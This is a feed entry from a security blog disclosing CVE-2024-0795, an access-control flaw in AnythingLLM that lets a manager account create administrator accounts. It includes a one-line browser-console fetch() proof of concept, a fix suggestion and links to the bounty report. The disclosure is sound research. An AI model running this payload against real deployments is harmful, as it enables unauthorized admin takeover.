broken access on Raltheo https://raltheo.fr/tags/broken-access/ Recent content in broken access on Raltheo Hugo -- gohugo.io en-us Sat, 02 Mar 2024 00:00:00 +0000 CVE-2024-0795 - Improper acces control / admin account takeover https://raltheo.fr/p/cve-2024-0795/ Sat, 02 Mar 2024 00:00:00 +0000 https://raltheo.fr/p/cve-2024-0795/ <img src="https://raltheo.fr/p/cve-2024-0795/wordmark.png" alt="Featured image of post CVE-2024-0795 - Improper acces control / admin account takeover" /><h1 id="improper-input-validation-leads-to-arbitrary-folder-deletion-recursively">Improper input validation leads to arbitrary folder deletion (recursively)</h1> <h2 id="-requirements">🔒️ Requirements</h2> <ul> <li>Multi-user mode activated</li> <li>Be manager</li> </ul> <h2 id="-observation">👀 Observation</h2> <p>We can see in the ui the manager account cannot create / add / modify admin account however the protection is not present in the server.</p> <h2 id="-proof-of-concept">💥 Proof of Concept</h2> <p>Here is the actual users :<br> <img src="https://i.ibb.co/qkYCWnX/image.png" loading="lazy" alt="image" ></p> <p>I will use raltheo2 account.</p> <ol> <li>I open chrome dev tools</li> <li>Inside the console I put :</li> </ol> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-js" data-lang="js"><span class="line"><span class="cl"><span class="nx">fetch</span><span class="p">(</span><span class="s1">&#39;/api/admin/users/new&#39;</span><span class="p">,</span> <span class="p">{</span><span class="nx">method</span><span class="o">:</span> <span class="s1">&#39;POST&#39;</span><span class="p">,</span><span class="nx">headers</span><span class="o">:</span> <span class="p">{</span><span class="s1">&#39;Authorization&#39;</span><span class="o">:</span> <span class="sb">`Bearer </span><span class="si">${</span><span class="nx">localStorage</span><span class="p">.</span><span class="nx">getItem</span><span class="p">(</span><span class="s1">&#39;anythingllm_authToken&#39;</span><span class="p">)</span><span class="si">}</span><span class="sb">`</span><span class="p">,</span><span class="s1">&#39;Content-Type&#39;</span><span class="o">:</span><span class="s1">&#39;application/json&#39;</span><span class="p">},</span> <span class="nx">body</span><span class="o">:</span> <span class="nx">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">({</span><span class="nx">username</span><span class="o">:</span> <span class="s1">&#39;supadmin9&#39;</span><span class="p">,</span> <span class="nx">password</span><span class="o">:</span> <span class="s1">&#39;password&#39;</span><span class="p">,</span> <span class="nx">role</span><span class="o">:</span> <span class="s1">&#39;admin&#39;</span><span class="p">})})</span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="https://i.ibb.co/KD8sk5X/image.png" loading="lazy" alt="image" ></p> <p>This will create an administrator account named <code>supadmin9</code> with password <code>password</code></p> <p><img src="https://i.ibb.co/3fGtvF8/image.png" loading="lazy" alt="image" ></p> <p>Now login into your new admin account :)</p> <hr> <h2 id="-fix-suggestion">🛠️ Fix suggestion</h2> <p>Separation should be made between admin and manager in server side as in the frontend.</p> <h2 id="-références">🖊️ références</h2> <p>You can find the report <a class="link" href="https://huntr.com/bounties/f69e3307-7b44-4776-ac60-2990990723ec/" target="_blank" rel="noopener" >here</a> and the CVE details <a class="link" href="https://nvd.nist.gov/vuln/detail/CVE-2024-0795" target="_blank" rel="noopener" >here</a>.</p>